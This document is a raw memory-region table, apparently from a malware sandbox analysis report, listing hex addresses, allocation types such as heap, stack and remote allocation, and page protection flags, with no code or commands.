trusted library allocation
|
page read and write
|
||
|
6410000
|
heap
|
page read and write
|
||
|
4BB0000
|
heap
|
page read and write
|
||
|
58B2000
|
heap
|
page read and write
|
||
|
2261A000
|
heap
|
page read and write
|
||
|
34CF000
|
heap
|
page read and write
|
||
|
9A2B000
|
direct allocation
|
page execute and read and write
|
||
|
73E0000
|
heap
|
page read and write
|
||
|
4A7E000
|
stack
|
page read and write
|
||
|
9C7A000
|
direct allocation
|
page execute and read and write
|
||
|
FD0000
|
trusted library section
|
page read and write
|
||
|
4BE0000
|
heap
|
page read and write
|
||
|
75E0000
|
trusted library allocation
|
page read and write
|
||
|
4BF6000
|
heap
|
page read and write
|
||
|
4BC0000
|
heap
|
page read and write
|
||
|
7820000
|
trusted library allocation
|
page read and write
|
||
|
33D0000
|
heap
|
page read and write
|
||
|
7340000
|
heap
|
page read and write
|
||
|
86B0000
|
trusted library allocation
|
page execute and read and write
|
||
|
61FC000
|
heap
|
page read and write
|
||
|
4F82000
|
trusted library allocation
|
page read and write
|
||
|
22C90000
|
unclassified section
|
page execute and read and write
|
||
|
65E000
|
stack
|
page read and write
|
||
|
73E8000
|
heap
|
page read and write
|
||
|
F4D000
|
trusted library allocation
|
page execute and read and write
|
||
|
73D0000
|
heap
|
page read and write
|
||
|
3434000
|
heap
|
page read and write
|
||
|
7622000
|
heap
|
page read and write
|
||
|
21494108000
|
trusted library allocation
|
page read and write
|
||
|
25FD000
|
stack
|
page read and write
|
||
|
893D000
|
stack
|
page read and write
|
||
|
C01000
|
heap
|
page read and write
|
||
|
2537B900000
|
trusted library allocation
|
page read and write
|
||
|
2B88000
|
heap
|
page read and write
|
||
|
C01000
|
heap
|
page read and write
|
||
|
D2F000
|
heap
|
page read and write
|
||
|
4842000
|
direct allocation
|
page execute and read and write
|
||
|
214A3937000
|
trusted library allocation
|
page read and write
|
||
|
7720000
|
trusted library allocation
|
page read and write
|
||
|
6C0000
|
heap
|
page read and write
|
||
|
462D000
|
direct allocation
|
page execute and read and write
|
||
|
21491B40000
|
heap
|
page read and write
|
||
|
29A0000
|
unkown
|
page readonly
|
||
|
2537BBA9000
|
trusted library allocation
|
page read and write
|
||
|
CE0000
|
heap
|
page read and write
|
||
|
5EE000
|
stack
|
page read and write
|
||
|
222E1000
|
direct allocation
|
page execute and read and write
|
||
|
F75000
|
trusted library allocation
|
page execute and read and write
|
||
|
400000
|
system
|
page execute and read and write
|
||
|
58D7000
|
heap
|
page read and write
|
||
|
4BB1000
|
heap
|
page read and write
|
||
|
C01000
|
heap
|
page read and write
|
||
|
2537BBC4000
|
trusted library allocation
|
page read and write
|
||
|
3547000
|
heap
|
page read and write
|
||
|
12FC000
|
stack
|
page read and write
|
||
|
2537B6F0000
|
trusted library allocation
|
page read and write
|
||
|
21940000
|
direct allocation
|
page read and write
|
||
|
537C000
|
stack
|
page read and write
|
||
|
4AAE000
|
stack
|
page read and write
|
||
|
83EE000
|
stack
|
page read and write
|
||
|
C01000
|
heap
|
page read and write
|
||
|
C30000
|
unkown
|
page readonly
|
||
|
49AE000
|
stack
|
page read and write
|
||
|
C01000
|
heap
|
page read and write
|
||
|
3540000
|
heap
|
page read and write
|
||
|
343E000
|
stack
|
page read and write
|
||
|
59D1000
|
heap
|
page read and write
|
||
|
C78000
|
heap
|
page read and write
|
||
|
2D2E000
|
stack
|
page read and write
|
||
|
C01000
|
heap
|
page read and write
|
||
|
3582000
|
heap
|
page read and write
|
||
|
4BF0000
|
heap
|
page read and write
|
||
|
214AB646000
|
heap
|
page read and write
|
||
|
22829000
|
heap
|
page read and write
|
||
|
22785000
|
heap
|
page read and write
|
||
|
852E000
|
stack
|
page read and write
|
||
|
49D1000
|
trusted library allocation
|
page read and write
|
||
|
820D000
|
stack
|
page read and write
|
||
|
647C000
|
heap
|
page read and write
|
||
|
9FC000
|
stack
|
page read and write
|
||
|
2B80000
|
heap
|
page read and write
|
||
|
7FF849170000
|
trusted library allocation
|
page read and write
|
||
|
7636000
|
trusted library allocation
|
page read and write
|
||
|
770D000
|
stack
|
page read and write
|
||
|
25A5000
|
heap
|
page read and write
|
||
|
8FA000
|
stack
|
page read and write
|
||
|
3581000
|
heap
|
page read and write
|
||
|
6710000
|
direct allocation
|
page read and write
|
||
|
684000
|
heap
|
page read and write
|
||
|
4BC7000
|
heap
|
page read and write
|
||
|
2B30000
|
heap
|
page read and write
|
||
|
291C000
|
stack
|
page read and write
|
||
|
3320000
|
heap
|
page read and write
|
||
|
862F000
|
stack
|
page read and write
|
||
|
1A47E679000
|
heap
|
page read and write
|
||
|
C01000
|
heap
|
page read and write
|
||
|
7720000
|
trusted library allocation
|
page read and write
|
||
|
4BD0000
|
heap
|
page read and write
|
||
|
C01000
|
heap
|
page read and write
|
||
|
50EF3FE000
|
unkown
|
page read and write
|
||
|
E00000
|
trusted library allocation
|
page read and write
|
||
|
82F0000
|
heap
|
page read and write
|
||
|
38C6000
|
heap
|
page read and write
|
||
|
D21000
|
heap
|
page read and write
|
||
|
28B0000
|
heap
|
page read and write
|
||
|
8280000
|
heap
|
page read and write
|
||
|
C01000
|
heap
|
page read and write
|
||
|
725F000
|
stack
|
page read and write
|
||
|
1A47E5BE000
|
heap
|
page read and write
|
||
|
28DF000
|
unkown
|
page read and write
|
||
|
CB0000
|
unkown
|
page read and write
|
||
|
6503000
|
heap
|
page read and write
|
||
|
4BD5000
|
heap
|
page read and write
|
||
|
21EC0000
|
remote allocation
|
page read and write
|
||
|
2B77000
|
heap
|
page read and write
|
||
|
2EAF000
|
stack
|
page read and write
|
||
|
561F000
|
heap
|
page read and write
|
||
|
1A47EC40000
|
heap
|
page read and write
|
||
|
4BB1000
|
heap
|
page read and write
|
||
|
496F000
|
stack
|
page read and write
|
||
|
C30000
|
unkown
|
page readonly
|
||
|
49B0000
|
heap
|
page read and write
|
||
|
4BD1000
|
heap
|
page read and write
|
||
|
7680000
|
heap
|
page execute and read and write
|
||
|
70FC000
|
stack
|
page read and write
|
||
|
7FF8490D0000
|
trusted library allocation
|
page read and write
|
||
|
2DE0000
|
heap
|
page read and write
|
||
|
4840000
|
trusted library allocation
|
page read and write
|
||
|
4BF6000
|
heap
|
page read and write
|
||
|
1A47E590000
|
heap
|
page read and write
|
||
|
21491BE3000
|
heap
|
page read and write
|
||
|
1A47E5E2000
|
heap
|
page read and write
|
||
|
6DD5000
|
heap
|
page execute and read and write
|
||
|
BFF000
|
stack
|
page read and write
|
||
|
21F1E000
|
stack
|
page read and write
|
||
|
C01000
|
heap
|
page read and write
|
||
|
2A20000
|
heap
|
page read and write
|
||
|
1A47E5BF000
|
heap
|
page read and write
|
||
|
2A8297C000
|
stack
|
page read and write
|
||
|
2217E000
|
stack
|
page read and write
|
||
|
21491B80000
|
heap
|
page read and write
|
||
|
1A47E65B000
|
heap
|
page read and write
|
||
|
211D0000
|
direct allocation
|
page read and write
|
||
|
C37000
|
stack
|
page read and write
|
||
|
7CD000
|
stack
|
page read and write
|
||
|
2EB2000
|
stack
|
page read and write
|
||
|
21970000
|
direct allocation
|
page read and write
|
||
|
C0000
|
unkown
|
page readonly
|
||
|
29D0000
|
heap
|
page read and write
|
||
|
FC8000
|
trusted library allocation
|
page read and write
|
||
|
87AB000
|
stack
|
page read and write
|
||
|
E20000
|
trusted library allocation
|
page execute and read and write
|
||
|
298E000
|
stack
|
page read and write
|
||
|
21DDF000
|
stack
|
page read and write
|
||
|
7110000
|
heap
|
page read and write
|
||
|
219BE000
|
stack
|
page read and write
|
||
|
CE000
|
unkown
|
page readonly
|
||
|
21170000
|
direct allocation
|
page read and write
|
||
|
77E000
|
stack
|
page read and write
|
||
|
771B000
|
heap
|
page read and write
|
||
|
C01000
|
heap
|
page read and write
|
||
|
8677000
|
heap
|
page read and write
|
||
|
4BAC000
|
trusted library allocation
|
page read and write
|
||
|
220FE000
|
stack
|
page read and write
|
||
|
8950000
|
trusted library allocation
|
page read and write
|
||
|
CC1000
|
unkown
|
page readonly
|
||
|
C01000
|
heap
|
page read and write
|
||
|
1340000
|
unkown
|
page readonly
|
||
|
7580000
|
trusted library allocation
|
page read and write
|
||
|
4C8E000
|
stack
|
page read and write
|
||
|
2EB4000
|
stack
|
page read and write
|
||
|
4918000
|
trusted library allocation
|
page read and write
|
||
|
2DA0000
|
heap
|
page read and write
|
||
|
709D000
|
stack
|
page read and write
|
||
|
21491B10000
|
heap
|
page read and write
|
||
|
48CC000
|
stack
|
page read and write
|
||
|
5A33000
|
trusted library allocation
|
page read and write
|
||
|
54B3000
|
trusted library allocation
|
page read and write
|
||
|
C7E000
|
stack
|
page read and write
|
||
|
355B000
|
heap
|
page read and write
|
||
|
26E9000
|
stack
|
page read and write
|
||
|
3200000
|
trusted library allocation
|
page read and write
|
||
|
CFF000
|
heap
|
page read and write
|
||
|
83F0000
|
trusted library allocation
|
page execute and read and write
|
||
|
5D1E000
|
stack
|
page read and write
|
||
|
76F4000
|
heap
|
page read and write
|
||
|
C01000
|
heap
|
page read and write
|
||
|
7FF849050000
|
trusted library allocation
|
page read and write
|
||
|
7690000
|
trusted library allocation
|
page read and write
|
||
|
7780000
|
trusted library allocation
|
page execute and read and write
|
||
|
4BD5000
|
heap
|
page read and write
|
||
|
1ACB15E0000
|
heap
|
page read and write
|
||
|
F0E000
|
stack
|
page read and write
|
||
|
1A47E8AB000
|
heap
|
page read and write
|
||
|
4BC0000
|
heap
|
page read and write
|
||
|
1A47EC46000
|
heap
|
page read and write
|
||
|
76B0000
|
trusted library allocation
|
page read and write
|
||
|
27AE000
|
stack
|
page read and write
|
||
|
C01000
|
heap
|
page read and write
|
||
|
C01000
|
heap
|
page read and write
|
||
|
2B60000
|
heap
|
page read and write
|
||
|
C01000
|
heap
|
page read and write
|
||
|
89F0000
|
direct allocation
|
page read and write
|
||
|
8450000
|
trusted library allocation
|
page read and write
|
||
|
610E000
|
stack
|
page read and write
|
||
|
488F000
|
stack
|
page read and write
|
||
|
963000
|
heap
|
page read and write
|
||
|
32B0000
|
heap
|
page readonly
|
||
|
C01000
|
heap
|
page read and write
|
||
|
75F8000
|
trusted library allocation
|
page read and write
|
||
|
75DB000
|
heap
|
page read and write
|
||
|
C01000
|
heap
|
page read and write
|
||
|
295E000
|
stack
|
page read and write
|
||
|
3054000
|
heap
|
page read and write
|
||
|
733E000
|
stack
|
page read and write
|
||
|
F522BFE000
|
stack
|
page read and write
|
||
|
469E000
|
direct allocation
|
page execute and read and write
|
||
|
86FD000
|
heap
|
page read and write
|
||
|
6110000
|
heap
|
page readonly
|
||
|
890000
|
unkown
|
page readonly
|
||
|
C01000
|
heap
|
page read and write
|
||
|
740C000
|
heap
|
page read and write
|
||
|
8270000
|
trusted library allocation
|
page execute and read and write
|
||
|
1A47E667000
|
heap
|
page read and write
|
||
|
4BF4000
|
heap
|
page read and write
|
||
|
304E000
|
stack
|
page read and write
|
||
|
C01000
|
heap
|
page read and write
|
||
|
C01000
|
heap
|
page read and write
|
||
|
1A47E664000
|
heap
|
page read and write
|
||
|
C01000
|
heap
|
page read and write
|
||
|
21491C4F000
|
heap
|
page read and write
|
||
|
2537B890000
|
heap
|
page read and write
|
||
|
7FF849080000
|
trusted library allocation
|
page read and write
|
||
|
53F0000
|
heap
|
page read and write
|
||
|
356D000
|
heap
|
page read and write
|
||
|
C01000
|
heap
|
page read and write
|
||
|
50C1000
|
heap
|
page read and write
|
||
|
357D000
|
heap
|
page read and write
|
||
|
21610000
|
heap
|
page read and write
|
||
|
3434000
|
heap
|
page read and write
|
||
|
7750000
|
heap
|
page read and write
|
||
|
4480000
|
heap
|
page read and write
|
||
|
4BD3000
|
heap
|
page read and write
|
||
|
CAC000
|
heap
|
page read and write
|
||
|
77C9000
|
trusted library allocation
|
page read and write
|
||
|
6ECE000
|
stack
|
page read and write
|
||
|
F50000
|
trusted library allocation
|
page read and write
|
||
|
2E5D000
|
stack
|
page read and write
|
||
|
59F9000
|
trusted library allocation
|
page read and write
|
||
|
48C0000
|
heap
|
page read and write
|
||
|
214ABD55000
|
heap
|
page read and write
|
||
|
43D0000
|
heap
|
page read and write
|
||
|
899000
|
heap
|
page read and write
|
||
|
4B1E000
|
stack
|
page read and write
|
||
|
1A47E675000
|
heap
|
page read and write
|
||
|
864C000
|
heap
|
page read and write
|
||
|
49AE000
|
stack
|
page read and write
|
||
|
43BE000
|
stack
|
page read and write
|
||
|
73E3000
|
heap
|
page read and write
|
||
|
48EB000
|
stack
|
page read and write
|
||
|
4BDC000
|
heap
|
page read and write
|
||
|
63C0000
|
direct allocation
|
page read and write
|
||
|
3450000
|
heap
|
page read and write
|
||
|
4BB8000
|
heap
|
page read and write
|
||
|
77D0000
|
trusted library allocation
|
page read and write
|
||
|
51C9000
|
heap
|
page read and write
|
||
|
684000
|
heap
|
page read and write
|
||
|
53C0000
|
trusted library allocation
|
page read and write
|
||
|
D34000
|
heap
|
page read and write
|
||
|
2B64000
|
heap
|
page read and write
|
||
|
C01000
|
heap
|
page read and write
|
||
|
21495826000
|
trusted library allocation
|
page read and write
|
||
|
1A47EC4E000
|
heap
|
page read and write
|
||
|
4BD5000
|
heap
|
page read and write
|
||
|
D2D000
|
heap
|
page read and write
|
||
|
7FF848FD1000
|
trusted library allocation
|
page read and write
|
||
|
8681000
|
heap
|
page read and write
|
||
|
9D45BFF000
|
stack
|
page read and write
|
||
|
3557000
|
heap
|
page read and write
|
||
|
8390000
|
heap
|
page read and write
|
||
|
7FF848EDC000
|
trusted library allocation
|
page execute and read and write
|
||
|
77C0000
|
trusted library allocation
|
page read and write
|
||
|
C01000
|
heap
|
page read and write
|
||
|
64FA000
|
heap
|
page read and write
|
||
|
7FF848E40000
|
trusted library allocation
|
page read and write
|
||
|
6FE0000
|
direct allocation
|
page read and write
|
||
|
75C9000
|
heap
|
page read and write
|
||
|
A90000
|
heap
|
page read and write
|
||
|
5A3B000
|
trusted library allocation
|
page read and write
|
||
|
779F000
|
heap
|
page read and write
|
||
|
2149412B000
|
trusted library allocation
|
page read and write
|
||
|
75F0000
|
trusted library allocation
|
page read and write
|
||
|
3544000
|
heap
|
page read and write
|
||
|
1A47E8AB000
|
heap
|
page read and write
|
||
|
4BED000
|
heap
|
page read and write
|
||
|
DC0000
|
trusted library allocation
|
page read and write
|
||
|
21960B90000
|
heap
|
page read and write
|
||
|
8890000
|
direct allocation
|
page read and write
|
||
|
2E00000
|
direct allocation
|
page read and write
|
||
|
630000
|
heap
|
page read and write
|
||
|
7780000
|
trusted library allocation
|
page read and write
|
||
|
74AE000
|
stack
|
page read and write
|
||
|
3581000
|
heap
|
page read and write
|
||
|
7260000
|
heap
|
page read and write
|
||
|
25379D35000
|
system
|
page execute and read and write
|
||
|
50EF4FF000
|
stack
|
page read and write
|
||
|
3054000
|
heap
|
page read and write
|
||
|
8648000
|
heap
|
page read and write
|
||
|
C01000
|
heap
|
page read and write
|
||
|
2D0E000
|
stack
|
page read and write
|
||
|
2E50000
|
remote allocation
|
page execute and read and write
|
||
|
22282000
|
direct allocation
|
page execute and read and write
|
||
|
2A82DFE000
|
stack
|
page read and write
|
||
|
21493B68000
|
trusted library allocation
|
page read and write
|
||
|
4BD5000
|
heap
|
page read and write
|
||
|
CB0000
|
unkown
|
page read and write
|
||
|
25379EF2000
|
heap
|
page read and write
|
||
|
3054000
|
heap
|
page read and write
|
||
|
28C0000
|
heap
|
page read and write
|
||
|
5012000
|
trusted library allocation
|
page read and write
|
||
|
7FF849010000
|
trusted library allocation
|
page execute and read and write
|
||
|
2149526A000
|
trusted library allocation
|
page read and write
|
||
|
49F8000
|
heap
|
page read and write
|
||
|
7FF848FE0000
|
trusted library allocation
|
page execute and read and write
|
||
|
7734000
|
heap
|
page read and write
|
||
|
C01000
|
heap
|
page read and write
|
||
|
1690000
|
unkown
|
page readonly
|
||
|
214ABD4D000
|
heap
|
page read and write
|
||
|
53C0000
|
trusted library allocation
|
page read and write
|
||
|
782D000
|
stack
|
page read and write
|
||
|
21EB9000
|
heap
|
page read and write
|
||
|
8F70000
|
direct allocation
|
page execute and read and write
|
||
|
CB0000
|
heap
|
page read and write
|
||
|
700000
|
heap
|
page read and write
|
||
|
64AF000
|
heap
|
page read and write
|
||
|
76CE000
|
stack
|
page read and write
|
||
|
8310000
|
trusted library allocation
|
page read and write
|
||
|
2840000
|
heap
|
page read and write
|
||
|
3054000
|
heap
|
page read and write
|
||
|
356A000
|
heap
|
page read and write
|
||
|
4BE1000
|
heap
|
page read and write
|
||
|
21491C4D000
|
heap
|
page read and write
|
||
|
1A47E8A8000
|
heap
|
page read and write
|
||
|
390B000
|
remote allocation
|
page execute and read and write
|
||
|
C01000
|
heap
|
page read and write
|
||
|
F4E000
|
stack
|
page read and write
|
||
|
438000
|
stack
|
page read and write
|
||
|
64F5000
|
heap
|
page read and write
|
||
|
34DB000
|
heap
|
page read and write
|
||
|
C40000
|
unkown
|
page readonly
|
||
|
6FDB000
|
stack
|
page read and write
|
||
|
2C8E000
|
stack
|
page read and write
|
||
|
521F000
|
trusted library allocation
|
page read and write
|
||
|
3434000
|
heap
|
page read and write
|
||
|
218DC000
|
stack
|
page read and write
|
||
|
FB0000
|
heap
|
page read and write
|
||
|
3054000
|
heap
|
page read and write
|
||
|
1360000
|
unkown
|
page read and write
|
||
|
A40000
|
heap
|
page read and write
|
||
|
34C6000
|
heap
|
page read and write
|
||
|
4CA8000
|
trusted library allocation
|
page read and write
|
||
|
4BBC000
|
heap
|
page read and write
|
||
|
7330000
|
heap
|
page read and write
|
||
|
C01000
|
heap
|
page read and write
|
||
|
4BDB000
|
heap
|
page read and write
|
||
|
4BF6000
|
heap
|
page read and write
|
||
|
4FFF000
|
trusted library allocation
|
page read and write
|
||
|
C01000
|
heap
|
page read and write
|
||
|
327B000
|
heap
|
page read and write
|
||
|
C01000
|
heap
|
page read and write
|
||
|
3050000
|
heap
|
page read and write
|
||
|
2213C000
|
stack
|
page read and write
|
||
|
EB5000
|
heap
|
page read and write
|
||
|
66C0000
|
direct allocation
|
page read and write
|
||
|
8570000
|
trusted library allocation
|
page read and write
|
||
|
5DF9000
|
trusted library allocation
|
page read and write
|
||
|
58BE000
|
heap
|
page read and write
|
||
|
880000
|
unkown
|
page readonly
|
||
|
6E1E000
|
stack
|
page read and write
|
||
|
227A0000
|
heap
|
page read and write
|
||
|
C0000
|
unkown
|
page readonly
|
||
|
FB0000
|
heap
|
page read and write
|
||
|
470F000
|
stack
|
page read and write
|
||
|
C70000
|
heap
|
page read and write
|
||
|
21491BC0000
|
heap
|
page read and write
|
||
|
25379EEF000
|
heap
|
page read and write
|
||
|
214ABC00000
|
heap
|
page read and write
|
||
|
21960000
|
direct allocation
|
page read and write
|
||
|
354C000
|
heap
|
page read and write
|
||
|
387E000
|
stack
|
page read and write
|
||
|
8580000
|
trusted library allocation
|
page read and write
|
||
|
3434000
|
heap
|
page read and write
|
||
|
482E000
|
stack
|
page read and write
|
||
|
C01000
|
heap
|
page read and write
|
||
|
5232000
|
heap
|
page read and write
|
||
|
38C5000
|
heap
|
page read and write
|
||
|
27A9000
|
stack
|
page read and write
|
||
|
21160000
|
direct allocation
|
page read and write
|
||
|
1A47E5F2000
|
heap
|
page read and write
|
||
|
3549000
|
heap
|
page read and write
|
||
|
214955EA000
|
trusted library allocation
|
page read and write
|
||
|
C40000
|
unkown
|
page readonly
|
||
|
7FF848E22000
|
trusted library allocation
|
page read and write
|
||
|
EC8000
|
trusted library allocation
|
page read and write
|
||
|
6504000
|
heap
|
page read and write
|
||
|
49C0000
|
trusted library allocation
|
page execute and read and write
|
||
|
7860000
|
trusted library allocation
|
page read and write
|
||
|
59A3000
|
heap
|
page read and write
|
||
|
8590000
|
trusted library allocation
|
page read and write
|
||
|
360E000
|
stack
|
page read and write
|
||
|
4BBC000
|
heap
|
page read and write
|
||
|
21EC0000
|
remote allocation
|
page read and write
|
||
|
90C000
|
stack
|
page read and write
|
||
|
C01000
|
heap
|
page read and write
|
||
|
63D5000
|
heap
|
page read and write
|
||
|
770E000
|
heap
|
page read and write
|
||
|
2AD0000
|
heap
|
page read and write
|
||
|
2A3C000
|
heap
|
page read and write
|
||
|
4500000
|
direct allocation
|
page execute and read and write
|
||
|
21493B75000
|
trusted library allocation
|
page read and write
|
||
|
22819000
|
heap
|
page read and write
|
||
|
C01000
|
heap
|
page read and write
|
||
|
66B0000
|
direct allocation
|
page read and write
|
||
|
2FF0000
|
unkown
|
page readonly
|
||
|
2F0B000
|
remote allocation
|
page execute and read and write
|
||
|
22556000
|
unclassified section
|
page execute and read and write
|
||
|
33D9000
|
heap
|
page read and write
|
||
|
21493866000
|
trusted library allocation
|
page read and write
|
||
|
1A47E670000
|
heap
|
page read and write
|
||
|
1300000
|
unkown
|
page read and write
|
||
|
C01000
|
heap
|
page read and write
|
||
|
780C000
|
stack
|
page read and write
|
||
|
C01000
|
heap
|
page read and write
|
||
|
22BB0000
|
heap
|
page read and write
|
||
|
21D30000
|
direct allocation
|
page read and write
|
||
|
58A3000
|
heap
|
page read and write
|
||
|
4BC6000
|
heap
|
page read and write
|
||
|
223DD000
|
unclassified section
|
page execute and read and write
|
||
|
2ACE000
|
stack
|
page read and write
|
||
|
7FF8490E0000
|
trusted library allocation
|
page read and write
|
||
|
3380000
|
heap
|
page read and write
|
||
|
333E000
|
stack
|
page read and write
|
||
|
A436BBA000
|
stack
|
page read and write
|
||
|
78B0000
|
trusted library allocation
|
page read and write
|
||
|
4852000
|
unclassified section
|
page read and write
|
||
|
7630000
|
trusted library allocation
|
page read and write
|
||
|
51A3000
|
trusted library allocation
|
page read and write
|
||
|
F30000
|
trusted library allocation
|
page read and write
|
||
|
71DE000
|
stack
|
page read and write
|
||
|
21495242000
|
trusted library allocation
|
page read and write
|
||
|
4BB1000
|
heap
|
page read and write
|
||
|
2E4F000
|
stack
|
page read and write
|
||
|
400000
|
system
|
page execute and read and write
|
||
|
33DB000
|
heap
|
page read and write
|
||
|
DE2000
|
trusted library allocation
|
page read and write
|
||
|
7403000
|
heap
|
page read and write
|
||
|
214ABBA7000
|
heap
|
page read and write
|
||
|
D5000
|
unkown
|
page read and write
|
||
|
C01000
|
heap
|
page read and write
|
||
|
4BD0000
|
heap
|
page read and write
|
||
|
870000
|
unkown
|
page readonly
|
||
|
2537B6F0000
|
trusted library allocation
|
page read and write
|
||
|
82C0000
|
heap
|
page read and write
|
||
|
3455000
|
heap
|
page read and write
|
||
|
3341000
|
heap
|
page read and write
|
||
|
A4371FF000
|
stack
|
page read and write
|
||
|
77A0000
|
trusted library allocation
|
page read and write
|
||
|
2A56000
|
heap
|
page read and write
|
||
|
72FF000
|
stack
|
page read and write
|
||
|
4FD0000
|
heap
|
page read and write
|
||
|
D7000
|
unkown
|
page readonly
|
||
|
2FF0000
|
heap
|
page read and write
|
||
|
4BC1000
|
heap
|
page read and write
|
||
|
2A82A7E000
|
stack
|
page read and write
|
||
|
3569000
|
heap
|
page read and write
|
||
|
1A47E662000
|
heap
|
page read and write
|
||
|
C01000
|
heap
|
page read and write
|
||
|
3434000
|
heap
|
page read and write
|
||
|
C01000
|
heap
|
page read and write
|
||
|
833E000
|
stack
|
page read and write
|
||
|
C01000
|
heap
|
page read and write
|
||
|
1690000
|
unkown
|
page readonly
|
||
|
4BD6000
|
heap
|
page read and write
|
||
|
22290000
|
unclassified section
|
page execute and read and write
|
||
|
12FC000
|
stack
|
page read and write
|
||
|
34C5000
|
heap
|
page read and write
|
||
|
21D8C000
|
heap
|
page read and write
|
||
|
6491000
|
heap
|
page read and write
|
||
|
6730000
|
direct allocation
|
page read and write
|
||
|
214A3641000
|
trusted library allocation
|
page read and write
|
||
|
4900000
|
heap
|
page readonly
|
||
|
357D000
|
heap
|
page read and write
|
||
|
354C000
|
heap
|
page read and write
|
||
|
FC0000
|
heap
|
page read and write
|
||
|
3AE0000
|
unkown
|
page execute and read and write
|
||
|
76FD000
|
heap
|
page read and write
|
||
|
82B0000
|
trusted library allocation
|
page read and write
|
||
|
31F0000
|
trusted library allocation
|
page read and write
|
||
|
C01000
|
heap
|
page read and write
|
||
|
75B0000
|
trusted library allocation
|
page read and write
|
||
|
214AC050000
|
heap
|
page read and write
|
||
|
63D0000
|
heap
|
page read and write
|
||
|
684000
|
heap
|
page read and write
|
||
|
C01000
|
heap
|
page read and write
|
||
|
1A47E8A0000
|
heap
|
page read and write
|
||
|
646C000
|
heap
|
page read and write
|
||
|
7020000
|
direct allocation
|
page read and write
|
||
|
214953F1000
|
trusted library allocation
|
page read and write
|
||
|
76C0000
|
trusted library allocation
|
page read and write
|
||
|
61E7000
|
heap
|
page read and write
|
||
|
214ABDAD000
|
heap
|
page read and write
|
||
|
4FE0000
|
trusted library allocation
|
page read and write
|
||
|
B93000
|
unkown
|
page read and write
|
||
|
DC9000
|
trusted library allocation
|
page read and write
|
||
|
C01000
|
heap
|
page read and write
|
||
|
2537BA00000
|
trusted library allocation
|
page read and write
|
||
|
4BEB000
|
heap
|
page read and write
|
||
|
847C000
|
stack
|
page read and write
|
||
|
4BBF000
|
heap
|
page read and write
|
||
|
473000
|
system
|
page execute and read and write
|
||
|
C01000
|
heap
|
page read and write
|
||
|
38C5000
|
heap
|
page read and write
|
||
|
1ACAF940000
|
heap
|
page read and write
|
||
|
5FCF000
|
stack
|
page read and write
|
||
|
2919000
|
heap
|
page read and write
|
||
|
1A47E8A9000
|
heap
|
page read and write
|
||
|
7830000
|
trusted library allocation
|
page read and write
|
||
|
139B000
|
heap
|
page read and write
|
||
|
2149583C000
|
trusted library allocation
|
page read and write
|
||
|
2A829FF000
|
stack
|
page read and write
|
||
|
4BB0000
|
heap
|
page read and write
|
||
|
4BF2000
|
heap
|
page read and write
|
||
|
2765000
|
heap
|
page read and write
|
||
|
1A47EC41000
|
heap
|
page read and write
|
||
|
7718000
|
heap
|
page read and write
|
||
|
7900000
|
trusted library allocation
|
page read and write
|
||
|
4530000
|
heap
|
page read and write
|
||
|
44F0000
|
trusted library allocation
|
page read and write
|
||
|
D60000
|
unkown
|
page read and write
|
||
|
4C32000
|
heap
|
page read and write
|
||
|
C01000
|
heap
|
page read and write
|
||
|
21960760000
|
heap
|
page read and write
|
||
|
948000
|
stack
|
page read and write
|
||
|
77E9000
|
heap
|
page read and write
|
||
|
1A47F357000
|
heap
|
page read and write
|
||
|
C01000
|
heap
|
page read and write
|
||
|
540D000
|
trusted library allocation
|
page read and write
|
||
|
C01000
|
heap
|
page read and write
|
||
|
6F40000
|
direct allocation
|
page read and write
|
||
|
3C0000
|
heap
|
page read and write
|
||
|
866E000
|
stack
|
page read and write
|
||
|
1A47F366000
|
heap
|
page read and write
|
||
|
CAE000
|
unkown
|
page read and write
|
||
|
6D9E000
|
stack
|
page read and write
|
||
|
EFF000
|
stack
|
page read and write
|
||
|
59E0000
|
heap
|
page read and write
|
||
|
4B40000
|
heap
|
page execute and read and write
|
||
|
3510000
|
heap
|
page read and write
|
||
|
357C000
|
heap
|
page read and write
|
||
|
7717000
|
trusted library allocation
|
page read and write
|
||
|
21F2A000
|
heap
|
page read and write
|
||
|
51CC000
|
trusted library allocation
|
page read and write
|
||
|
C60000
|
heap
|
page read and write
|
||
|
1A47E5CF000
|
heap
|
page read and write
|
||
|
589F000
|
stack
|
page read and write
|
||
|
C01000
|
heap
|
page read and write
|
||
|
4C12000
|
heap
|
page read and write
|
||
|
1A47F372000
|
heap
|
page read and write
|
||
|
893000
|
heap
|
page read and write
|
||
|
21A0D000
|
stack
|
page read and write
|
||
|
E7F000
|
stack
|
page read and write
|
||
|
89D0000
|
direct allocation
|
page read and write
|
||
|
76D000
|
stack
|
page read and write
|
||
|
21491A30000
|
heap
|
page read and write
|
||
|
7EF80000
|
trusted library allocation
|
page execute and read and write
|
||
|
21495468000
|
trusted library allocation
|
page read and write
|
||
|
77B0000
|
trusted library allocation
|
page read and write
|
||
|
214940E6000
|
trusted library allocation
|
page read and write
|
||
|
6DDE000
|
stack
|
page read and write
|
||
|
2990000
|
heap
|
page read and write
|
||
|
6500000
|
heap
|
page read and write
|
||
|
278D000
|
stack
|
page read and write
|
||
|
4BC0000
|
heap
|
page read and write
|
||
|
C01000
|
heap
|
page read and write
|
||
|
21D40000
|
direct allocation
|
page read and write
|
||
|
974000
|
heap
|
page read and write
|
||
|
5558000
|
trusted library allocation
|
page read and write
|
||
|
14B0000
|
heap
|
page read and write
|
||
|
21491CA7000
|
heap
|
page read and write
|
||
|
484A000
|
trusted library allocation
|
page execute and read and write
|
||
|
684000
|
heap
|
page read and write
|
||
|
C01000
|
heap
|
page read and write
|
||
|
7594000
|
heap
|
page read and write
|
||
|
53C0000
|
trusted library allocation
|
page read and write
|
||
|
D00000
|
trusted library allocation
|
page read and write
|
||
|
447C000
|
heap
|
page read and write
|
||
|
DB3000
|
trusted library allocation
|
page execute and read and write
|
||
|
5150000
|
trusted library allocation
|
page read and write
|
||
|
4BD4000
|
heap
|
page read and write
|
||
|
6F0F000
|
stack
|
page read and write
|
||
|
7FF848E24000
|
trusted library allocation
|
page read and write
|
||
|
4BD3000
|
heap
|
page read and write
|
||
|
25379EC0000
|
heap
|
page read and write
|
||
|
A4374FD000
|
stack
|
page read and write
|
||
|
4510000
|
heap
|
page read and write
|
||
|
650C000
|
heap
|
page read and write
|
||
|
3054000
|
heap
|
page read and write
|
||
|
4BEB000
|
heap
|
page read and write
|
||
|
7D5E000
|
stack
|
page read and write
|
||
|
4BEF000
|
heap
|
page read and write
|
||
|
2750000
|
heap
|
page read and write
|
||
|
2196081B000
|
heap
|
page read and write
|
||
|
4BD0000
|
heap
|
page read and write
|
||
|
7880000
|
trusted library allocation
|
page read and write
|
||
|
21EB5000
|
heap
|
page read and write
|
||
|
214ABB20000
|
heap
|
page read and write
|
